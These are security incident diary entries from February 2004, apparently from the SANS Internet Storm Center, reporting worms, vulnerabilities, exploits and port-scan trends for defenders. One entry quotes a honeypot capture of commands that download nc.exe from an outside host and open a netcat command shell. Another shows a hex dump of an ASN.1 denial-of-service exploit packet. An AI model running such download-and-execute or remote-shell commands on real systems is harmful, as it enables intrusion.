Diaries

Published: 2004-02-29

WFTPD unpatched exploit and potential DDoS against anti-spyware forums


K-OTik Security submitted information in regards to an WFTPD Server / WFTPD Pro Server exploit. This is an overflow that can allow a logged in user to run arbitrary code as a SYSTEM or the user that started WFTPD (depending on the version) More information:

http://lists.netsys.com/pipermail/full-disclosure/2004-February/018031.html

There's already an exploit for this, and the developer hasn't released a patch for the tested versions (3.21 & 3.10, both regular and Pro versions)

-----

Someone pointed out that at least one of the anti-Spyware forums have been having problems with DoS attacks. More information can be found at:

http://www.netrn.net/spywareblog/

See the Feb 16th entry.

Handler on Duty (substituting for Lorna Hutcheson)
Davis Ray Sickmon Jr, Midnight Ryder Technologies ( http://www.midnightryder.com )

0 Comments

Published: 2004-02-28

Backdoors left behind by worms; DHCP connection

Backdoors left behind by worms

With the increase of worms opening backdoor on infected systems, scanning on port 80, 135, 445, 1080, 3127, 3128 and 10080 remains high. In particular, this could be due to Welchia and Mydoom worms. The latest Beagle worm opens a backdoor on port 2745.

DHCP connection

A gentle reminder that when you have a DHCP address from your ISP, you will likely receive garbage destined to the previous owner for up to several hours after you connect. This is because of P2P and other applications unaware that the IP was dynamically assigned.

0 Comments

Published: 2004-02-27

Updated: Bagle C Virus. New Vulnerability in RealSecure and BlackIce Products, Solaris 8 and 9 passwd(1) bulletin, WinZip flaw, IE cross-frame scripting issue

Bagle C

Just in: A new virus, appearently part of the Bagle family, was sighted.
The virus is not detected by common AV products at this point. It uses
.zip attachments. First sightings were reported around 5-6 PM EST (10-11pm UTC).


New Vulnerability in RealSecure and BlackIce Products

eEye Security released a bulletin last night with details concerning a serious vulnerability in RealSecure/BlackICE Server Message Block (SMB) Processing. Details are at


http://www.eeye.com/html/Research/Advisories/AD20040226.html

According to eEye, only one SMB packet is required to exploit this vulnerability. The issue is with the way that an SMB packet is processed, analyzed, and reassembled. It is during this phase that specially crafted data can be passed to an improperly checked heap-based buffer. Such a heap overwrite can lead to reliable remote code execution with this vulnerability. No known proof of concept or other public exploit is in current circulation, however systems running either of these products should be patched immediately.


Updates for these products are available from ISS at


http://www.iss.net/download/

Solaris 8 and 9 passwd(1) privilege escalation

Yesterday, Sun released a bulletin announcing a patch to a potential privilege escalation vulnerability in the passwd(1) program in certain versions of Solaris 8 and 9 (Solaris 7 is not vulnerable). Complete details are at


http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57454&zone_32=category%3Asecurity

Solaris admins should read the bulletin and patch as soon as practical.


WinZip MIME parsing buffer overflow

iDefense published a bulletin today describing a vulnerability in the popular WinZip utility including WinZip 9 beta and WinZip 8.1 SR-1, though not the WinZip 9 final release. It is believed that earlier versions are also likely to be vulnerable. This vulnerability is in the MIME parameter parsing routines of WinZip. One workaround involves disabling the extension handlers for certain vulnerable file types to prevent exploitation by double-clicking on archives. Unlike many of the recent worms where infection required opening a document within a .zip attachment, this one could be exploited simply by opening the archive to see what was inside. As always, users are urged to be extremely cautious in opening e-mail attachment. Note that exploitation is also possible via web links or peer-to-peer file sharing. More details can be found here


http://www.idefense.com/application/poi/display?id=76&type=vulnerabilities&flashstatus=false


IE cross-frame scripting exposure

iDefense also published a bulletin today describing a cross-frame scripting vulnerability in patched versions of Internet Explorer. While exploit requires a user to click on a link, when coupled with the vulnerability described in Microsoft's bulletin MS04-004, the user may not actually be aware that they are following a link to a malicious web site and may inadvertantly supply sensitive personal information to unintended parties. IE users should be sure to apply the patch described in MS04-004 and then should verify the address of the web site in the address bar before supplying personal information in web forms. Complete details can be found here


http://www.idefense.com/application/poi/display?id=77&type=vulnerabilities&flashstatus=false



---Jim Clausing

0 Comments

Published: 2004-02-25

New virus, exploits, and old tricks.


We received several reports of strings in web server logs that looks like WebDav exploit code. A series of 02 1b 02 1b is the string is being reported.
We have not been able to get any packet captures of this if you get one please send it to us.

A new version of the Netsky virus, Netsky.c is making its rounds. http://vil.nai.com/vil/content/v_101048.htm. It spreads via email and entices the user to open it with suggestive content.

We have received a report of “missing email attachments” Johannes suggested: “Due to a recent flood of new viruses, many organizations are re-evaluating their e-mail policy and as a result strip any attachment, not just attachments that are known to be viruses. “

We have received more reports of the IPSWITCH imail ldap-exploit being seen in the wild. George Bakos offered “If anyone wants full binary captures of this stuff in the wild, I've been seeing it in my various thp (tiny honey pot) hosts since 2/19.”

0 Comments

Published: 2004-02-24

ICQ-Based Bizex Worm, MyDoom.F, Checking Your Server Logs

ICQ-Based "Bizex" Worm

-----------------------------------------------------------

A new Win32 worm, aimed at users of the messaging software ICQ is making the rounds. The worm, dubbed "Bizex," is loaded onto a machine using a combination of ICQ behaviors and vulnerabilities in Internet Explorer and Windows when a user visits the site www.jokeworld.biz (currently unresolvable). Once executed, the worm then sends messages to ICQ contacts suggesting that they visit the JokeWorld site. The worm reportedly searches infected machines for specific financial information and installs a keylogger in an attempt to steal passwords. More information:



http://www.techweb.com/wire/story/TWB20040224S0006





MyDoom.F

-----------------------------------------------------------

Proving once again that human gullibility knows no bounds, the MyDoom.F email-based worm is slowly increasing in "popularity." Unlike its kinder and gentler MyDoom siblings, this one not only installs a backdoor and mailbombs the known world, but it has a nasty habit of randomly deleting files with specific extensions. More information:



http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_MYDOOM.F



http://us.mcafee.com/virusInfo/default.asp?id=helpCenter&hcName=mydoom_f





Checking Your Server Logs

-----------------------------------------------------------

Earlier, we received a report from an admin who, looking through his webserver logs, was able to identify a compromised system that had been used as a "toolz" dump. This highlights again, the importance of regularly examining your web server logs for signs of malicious activity and following up on what you find there. Thanks to this admin's efforts, the owners of the compromised system were contacted and the dump was taken offline.



If you're not regularly checking your webserver logs, or if you're not sure what to look for, here is an excellent guide that explains not only what to look for, but also explains why it's important.



http://www.securiteam.com/securityreviews/6H00C1535K.html





-----------------------------------------------------------

Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )

0 Comments

Published: 2004-02-23

Ipswitch iMail LDAP Exploit Correlation, Port 3991 activity request

Ipswitch iMail LDAP Exploit Correlation

The packet captures we've received have allowed us to correlate the increase in port 389 scanning as activity from a recently released exploit tool against the Ipswitch iMail LDAP server.

We were unable to get in touch with Ipswitch to comment on this vulnerability. Ipswitch customers using the iMail LDAP server are advised to implement filtering on port 389 until a patch is made available.
Port 3991 Captures Request

We have seen a spike in activity over the past few days on port 3991. We are looking for more full packet captures of this activity. Please compress files and send as attachments to handlers@sans.org.
--Joshua Wright/Handler on Duty

0 Comments

Published: 2004-02-22

LDAP Scan increase. Win98 ASN.1 patch, MyDoom Remover, Win98 free update CD

LDAP scan increase
We are seeing a significant increase in scans for port 389. This port is
associated with LDAP. LDAP is used by a variety of different systems,
in particular Windows active directory. At this point, it is not clear
what these scans are attempting to accomplish. If you have any information,
in particular FULL PACKET CAPTURES (not just firewall logs), let us know.

http://www.dshield.org/port_report.php?port=389
Update
The increase in port 389 scans is believed to be due to a new exploit
against the iMail LDAP server. The exploit has been posted here:

http://www.coromputer.net/files/ldaped.c
Windows 98 ASN.1 Patch


Readers reported to our handlers team that Microsoft is distributing a patch
for the ASN.1 issue to Windows 98 users per request. If you are running Windows
98, contact your Microsoft representative for the location of the patch.

As reported earlier, the ASN.1 advisory MS04-007 only covers newer versions of
Windows. Windows 98 is however still vulnerable.

Workaround: you may want to consider renaming or removing msasn1.dll. However, please test this fix carefully as it may break some software.

Careful! Do not trust any patches sent via e-mail.

MyDoom Remover release via Windows Update


Currently, Microsoft is offering a MyDoom virus remover via its Windows Update service.


Free Windows Patch CD


Microsoft offers a free patch CD for all currently supported versions of windows.
You can order a CD here:


http://www.microsoft.com/security/protect/cd/order.asp
------------

Johannes Ullrich, SANS Institute jullrich_AT_sans.org

http://isc.sans.org/contact.html

0 Comments

Published: 2004-02-18

Netsky.b Virus / Win98 ASN.1 patch / new Mremap PoC

Netsky.b Virus


Today a new mass mailing virus was discovered. It is called Netsky.b and according Symantec it uses its own SMTP engine to send itself to the email addresses. It will also search all drives beginning from drive C to Z, looking for "share" and "sharing" folders to copy itself into the folders.


Symantec currently considers it as Level 4 (Severe).


Reference: http://www.sarc.com/avcenter/venc/data/w32.netsky.b@mm.html





Microsoft Windows 98 Patch



A post to Bugtraq and Full Disclosure mailing lists today informs that apparently Windows 98 is also vulnerable to the MS04-007. It is not clear yet if the patch exists, or if it will be or not available on Microsoft Windows Update website or how it will be delivered.
The Microsoft Security Bulletin MS04-007 does not include any reference to Windows 98, so users should, as usual, be careful against any non-official patches for Win98.


Reference:
http://lists.netsys.com/pipermail/full-disclosure/2004-February/017520.html



Linux Mremap PoC



A proof of concept code was published on Full Disclosure list today. This PoC intends to test the new mremap vulnerability was discovered on kernel 2.4.24 and previous.
CVE has assigned the name CAN-2004-0077 to this issue.


Please check your Linux vendor for Updates. Most of the major Linux distributions already released patches for this vulnerability.


Reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0077


-------------------------------------------------

Handler on duty: Pedro Bueno (bueno@ieee.org)

0 Comments

Published: 2004-02-17

New Mass Mailing Virus


New Mass Mailing Virus




A new mass mailing virus is spreading around the Internet today. Most of the Anti-Virus vendors are calling it Bagle.B. This virus harvests email addresses from infected computers and uses those addresses as the To: address while spoofing the From: address. The primary characteristics of the emails it sends are as follows:



* Subject: ID <random characters>... thanks

* Body:

* Yours ID <random characters>

* - -

* Thank

* Attachment: <random characters>.exe



If the attachment is opened, it will create a backdoor on tcp port 8866 and
will search 4 websites for email addresses to announce the IP address of
the infected computer to would-be hackers. Afterwards the infected
computer will start mass-mailing the virus laden emails to any email
addresses it finds on the infected computer.


Verify that your Anti-Virus software is up to date, and continue to practice safe computing practices. If you were not expecting the attachment don't touch it.


For more technical details please check the following websites.


Symantec - http://www.sarc.com/avcenter/venc/data/w32.alua@mm.html



McAfee - http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=101030

Sophos - http://www.sophos.com/virusinfo/analyses/w32tanxa.html


(or your favorite Anti-Virus Vendor's website)


Thanks to Scott Fendley for the use of this information.




New worms and viruses


Today has been a busy day for SysAdmin's. There has been an explosion of new worms and malware seen today. It is important for everyone to use extreme care for the next few days as this activity shakes out.



50% Increase in Email Fraud and Phishing in January


According to an article at finextra.com, " E-mail fraud and phishing scams grew by more than 50% in January, with an average of 5.7 new, unique attacks sent out to millions of consumers each day." Check out the article at

http://www.finextra.com/topstory.asp?id=11196




Handler on Duty

Deb Hale

haled@pionet.net

0 Comments

Published: 2004-02-16

ASN.1 DoS exploit hostname resolution, Recent Scan Increases, anti spam effort

ASN.1 DoS and MyDoomB hostname resoultion

An aspect of MyDoomB that did not receive a lot of attention was it's ability to "gethostbyname()" to resolve its IP and scan it's LAN. A published ASN.1 DOS exploit requires the hostname to work. Resolving IP addresses to hostnames can arguably be a principal method that will be used by worms written to exploit some of the
vulnerabilities described in MS-04-007. This information can be used for defensive purposes. If you have not patched 100% of your MS-04-007 vulnerable systems you may find the following information published by Symantec useful today or in the near future.

An example of what the "IP to hostname" traffic may look like on a network;

"Another thing to look for is a succession of ARP requests for consecutive addresses from the same host, like this:

11:43:50.435946 arp who-has 169.254.14.115 tell 169.254.56.166
11:43:50.438301 arp who-has 169.254.14.116 tell 169.254.56.166
11:43:50.445362 arp who-has 169.254.14.117 tell 169.254.56.166
11:43:50.460087 arp who-has 169.254.14.118 tell 169.254.56.166
11:43:50.466885 arp who-has 169.254.14.119 tell 169.254.56.166
11:43:50.482358 arp who-has 169.254.14.120 tell 169.254.56.166
11:43:50.484681 arp who-has 169.254.14.121 tell 169.254.56.166
11:43:50.498546 arp who-has 169.254.14.122 tell 169.254.56.166
11:43:50.505680 arp who-has 169.254.14.123 tell 169.254.56.166
11:43:50.514562 arp who-has 169.254.14.124 tell 169.254.56.166
11:43:50.531488 arp who-has 169.254.14.125 tell 169.254.56.166
11:43:50.534873 arp who-has 169.254.14.126 tell 169.254.56.166
11:43:50.546532 arp who-has 169.254.14.127 tell 169.254.56.166
11:43:50.554933 arp who-has 169.254.14.128 tell 169.254.56.166
11:43:50.570009 arp who-has 169.254.14.129 tell 169.254.56.166
11:43:50.577407 arp who-has 169.254.14.130 tell 169.254.56.166
11:43:50.588931 arp who-has 169.254.14.131 tell 169.254.56.166
11:43:50.600770 arp who-has 169.254.14.132 tell 169.254.56.166
11:43:50.606802 arp who-has 169.254.14.133 tell 169.254.56.166"
"Detecting network traffic that may be due to RPC worms"
http://securityresponse.symantec.com/avcenter/venc/data/detecting.traffic.due.to.rpc.worms.html

Anti-Spam effort getting traction - SPF (It's NOT Shortest Path First)

Sender Policy Framework
http://spf.pobox.com/

SPF is an attention getting and growing effort to fight "email address forgery and makes it easier to identify spams, worms, and viruses".

Over "7089 domains with SPF records are known".
http://spftools.infinitepenguins.net/register.php

Scans on Port 80 and 445 since last Wednesday February 11th - Welchia.B

Increased scanning activity is principally attributed to the release of the Welchia.B.Worm on or about Wednesday February 11th. ISC/DSHield data indicate that there were approximately 40,000 systems scanning for Port 80 last Tuesday February 10th 2004 and that number increased over the next few days to a peak number of 377,089, a whopping increase of 337,089 systems. Over a similar time period scans of Port 445 increased from approximately 75,ooo systems scanning to a peak of 331,901 on 02/15/04, an increase of 256,901 systems. Welchia.B exploits multiple Windows vulnerabilities by attacking TCP port 135, TCP port 80, and two vulnerabilities on TCP port 445. A DShield and security-focus list participant, Frank Knobbe, who has been looking at the increased Port 80 scanning, had the following securityfocus list comments (reprinted with the authors permission) about the amount of traffic sent at webservers he monitors;

"The interesting thing is that of those 20-some packets, a lot of them do
not have shellcode included, just sleds of varying length. Seems like
the code for the WebDAV exploit is broken. Thank God for small favors...
However, it's a noisy bugger. It's approaching the level of pollution of
the SQL Slammer. Unfortunately this one can not be filtered on ISP
routers. Looks like we have to learn to live with an increasing level of
bandwidth wasted on noise like this."

Patches have been available by the vendor for some time. These scans of Ports 80, and 445 and are not associated with any MS 04-007/ASN.1 remote exploits at this time.

Scans on Port 3127

Scans for Port 3127 dropped significantly on the date the DDoS component of MyDoom.A worm was set to expire (02/12/04). See the graph at;
http://isc.incidents.org/port_details.html?port=3127

Published information says only the DDoS component was set to expire, so why did scans for 3127 drop significantly? It is also apparent that there is a significant effort for control of blocks of MyDoom infected systems. George Bakos and his TinyHoneyPot (THP) submitted an example:

"Some creative young soul is using the MyDoom backdoor (port 3127) to return a command shell using **editorial snip** ... netcat on port 999 **editorial snip** ......

Here's the thp capture:
echo Dim DataBin>c:\madefile.vbs
echo Dim HTTPGET>>c:\madefile.vbs
echo Set HTTPGET = CreateObject(^"^Microsoft.XMLHTTP^"^)>>c:\madefile.vbs

echo HTTPGET.Open ^"^GET^"^, ^"^http://mitglied.lycos.de/norbertberg/nc.exe^"^, False>>c:\madefile.vbs
echo HTTPGET.Send>>c:\madefile.vbs
echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs
echo Const adTypeBinary=1 >>c:\madefile.vbs
echo Const adSaveCreateOverWrite=2 >>c:\madefile.vbs
echo Dim SendBinary>>c:\madefile.vbs

echo Set SendBinary = CreateObject(^"^ADODB.Stream^"^)>>c:\madefile.vbs
echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs
echo SendBinary.Open>>c:\madefile.vbs
echo SendBinary.Write DataBin>>c:\madefile.vbs
echo SendBinary.SaveToFile ^"^c:\nc.exe^"^, adSaveCreateOverWrite>>c:\madefile.vbs
C:\madefile.vbs

del C:\madefile.vbs
start C:\nc.exe -vv -l -p 999 -e cmd

Scans for Port 2234

Scans for Port 2234 may be associated with Deadhat and Deadhat.B which both have a component to spread through the Soulseek file-sharing program.
http://isc.incidents.org/port_details.html?port=2234

Patrick Nolan

0 Comments

Published: 2004-02-15

More on MS04-007

Port 80 and 445 activity

Dshield showed a huge spike in port 80 and 445 traffic on Saturday which appears to be slowing down again. This may have been due to scanning for (or actual denial of service attempts for) the MS04-007 vulnerability.



From the mailbag
An e-mail message making the rounds claims that the recipient is under "police investigation" and gives a link to follow for more information. This link downloads a Trojan onto the user's computer. The site (federalpolice.com) is still live at the time of this writing.



From the mailbag 2
An individual contacted the handlers asking whether or not they should call in their admin staff over the (holiday in the US) weekend to have them apply the MS04-007 patches. There are no known worms exploiting this vulnerability at this time (though one is probably only days away) and the exploit released yesterday was "only" a denial of service. Given that most organizations will block the ports used in this exploit at their firewalls, the risk is mostly from insiders. On the other hand, remember that many organizations have been hit hard by the last few significant worms even though their perimeters were reasonably secure when employees brought laptops that had been infected at home into work and plugged into company networks. Important servers should be patched as soon as possible and workstations and laptops should not be far behind. Each organization needs to do the risk analysis for itself (but the handler-on-duty's team was patching over the weekend).



---Jim Clausing

0 Comments

Published: 2004-02-14

MS04-007 Exploit released

Happy Valentines Day!

A DOS exploit has been made available using the ASN.1 bug (MS04-007). This exploit uses port 445, 139 or 135. While this is just a DOS exploit, more serious exploits may follow soon.

Note: This Exploit appears to work only against Windows 2000 Professional. Dont forget history, it wasnt long after Dcom came out, that we saw universal shellcode for almost all windows platforms.


This may be your last chance to apply the patch!

(See yesterday's diary for more details regarding ASN.1)



The exploit kills lsass.exe (see definition below), fires an error message to the screen, and reboots the machine after approximately 1 minute.


According to: Liutilitilies.com ( http://www.liutilities.com/products/wintaskspro/processlibrary/lsass/ ) Lsass is:


Process File: lsass or lsass.exe

Process Name: Local Security Authority Service

Description: Windows Local Security Authority Server Process handles Windows security mechanisms. It verifies the validity of user logons to your computer or server. Technically, the software generates the process that is responsible for authenticating users for the Winlogon service.

Below are screen captures from the error log and lsass crash message:


http://isc.sans.org/images/lsasspopup.gif

http://isc.sans.org/images/errorlog.gif




20:26:04.281879 192.168.1.13.1087 > 192.168.1.11.139: tcp 1460 (DF) (ttl 128, id 438, len 1500)
0x0000 4500 05dc 01b6 4000 8006 6ffd c0a8 010d E.....@...o.....
0x0010 c0a8 010b 043f 008b e01c 2816 ab83 5c57 .....?....(...\W
0x0020 5010 4413 cd30 0000 0000 0885 ff53 4d42 P.D..0.......SMB
0x0030 7300 0000 0008 01c8 0000 0000 0000 0000 s...............
0x0040 0000 0000 0000 7503 0000 0300 0cff 0000 ......u.........
0x0050 00ff ff02 0001 0000 0000 0033 0800 0000 ...........3....
0x0060 005c 0000 804a 0860 8208 2f06 062b 0601 .\...J.`../..+..
0x0070 0505 02a0 8208 2330 8208 1fa0 0e30 0c06 ......#0.....0..
0x0080 0a2b 0601 0401 8237 0202 0aa1 0523 0303 .+.....7.....#..
0x0090 0107 a282 0804 0482 0800 4e54 4c4d 5353 ..........NTLMSS
0x00a0 5000 0100 0000 1502 0860 0900 0900 2000 P........`......
0x00b0 0000 0700 0700 2900 0000 574f 524b 4752 ......)...WORKGR
0x00c0 4f55 5044 4546 4155 4c54 4141 4141 4141 OUPDEFAULTAAAAAA
0x00d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0100 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0110 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0120 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0130 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0140 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0150 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0160 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0170 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0180 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0190 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0200 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0210 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0220 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0230 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0240 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0250 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0260 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0270 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0280 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0290 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0300 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0310 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0320 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0330 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0340 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0350 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0360 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0370 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0380 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0390 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
.....
Snip ... ending with this packet:
20:26:04.282134 192.168.1.13.1087 > 192.168.1.11.139: tcp 725 (DF) (ttl 128, id 439, len 765)
0x0000 4500 02fd 01b7 4000 8006 72db c0a8 010d E.....@...r.....
0x0010 c0a8 010b 043f 008b e01c 2dca ab83 5c57 .....?....-...\W
0x0020 5018 4413 4eef 0000 4141 4141 4141 4141 P.D.N...AAAAAAAA
0x0030 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0040 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0050 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0060 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0070 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0080 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0090 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x00f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0100 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0110 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0120 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0130 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0140 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0150 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0160 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0170 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0180 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0190 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01e0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x01f0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0200 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0210 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0220 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0230 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0240 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0250 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0260 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0270 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0280 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x0290 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02a0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02b0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02c0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0x02e0 4141 4141 4141 0055 006e 0069 0078 0000 AAAAAA.U.n.i.x..
0x02f0 0053 0061 006d 0062 0061 0000 00 .S.a.m.b.a...


Handler on Duty: Mike Poor [ mike@intelguardians.com ]

0 Comments

Published: 2004-02-13

Windows Source Code; How to Detect ASN.1 Exploits

Windows Source Code. As most of the infosec community knows, the big buzz over the past 24 hours was the reported leakage of Windows 2000 and Windows NT 4.0 source code. We are only mentioning it in the diary since we have received numerous requests yesterday and today for copies of the code or pointers to where it is located. The SANS Internet Storm Center does not condone unauthorized duplication of copyrighted software, and respects Microsoft's desire to protect their intellectual property.



How to Detect ASN.1 Exploits. MS04-007 contains details on a significant flaw in the .dll file that handles the parsing of Abstract Syntax Notation One (ASN.1) Basic Encoding Rules (BER). Similar ASN.1 BER implementation flaws in SNMP were the subject of a University of Oulu, Finland study in 2001 which was published in early 2002. ASN.1 is a formal language for abstractly describing messages to be exchanged among an extensive range of applications such as


- Cellular phone, 800-number phone call routing, and Signaling System 7 (SS7)

- Air traffic control systems

- Package tracking

- SCADA systems

- SNMP, LDAP, SSL, and other common protocols

- X.9 financial transaction protocols

- RSA public key cryptographic standards

- T.120, H.323, X.400, and X.500 standards


The flaws in Microsoft's implementation of the ASN.1 encoding rules are a reminder that other software vendors and developers need to continue reviewing their own implementations to ensure that they have not overlooked potential errors and flaws.


In the past few days the ISC was asked if there are ways to detect exploits directed at ASN.1 encoding rule implementation vulnerabilities. The short answer to that question is, "it depends." It depends on the specific code module that has the flaw and the services or applications that depend on it. Any of the applications that depend on the flawed Microsoft .dll file are vulnerable to an exploit, but the form of that exploit will depend on the way the application interacts with the .dll file.



A note to the ladies - Happy Valentine's Day! (Guys - don't forget!)



Marcus H. Sachs

The SANS Institute

Handler on duty


0 Comments

Published: 2004-02-12

Nachia B Worm, Microsoft XML

Nachi B

'Nachi-B' (aka W32.Welchia.B.Worm) started to circulate yesterday.
Like Nachi-A, which was released last August, Nachi-B uses the
RPC DCOM vulnerability and the IIS WebDav vulnerability to enter
a system.

However, Nachi-B adds the Workstation service buffer overflow (MS03-049)
and the Locater service vulnerability (MS03-001) to its arsenal.

In addition to patching for the RPC DCOM vulnerability for some versions
of Windows, it will removed files left behind by MyDoom.

Infected machines will generate traffic to port 135 tcp, 80 tcp, 139 tcp and 445 tcp.

Our data illustrates the spread of this virus. See the increase in traffic to
port 80: http://isc.sans.org/port_details.html?port=80 , and to port 445: http://isc.sans.org/port_details.html?port=445 over the last two days. Approximately, an additional 70,000 is scanning these two ports.

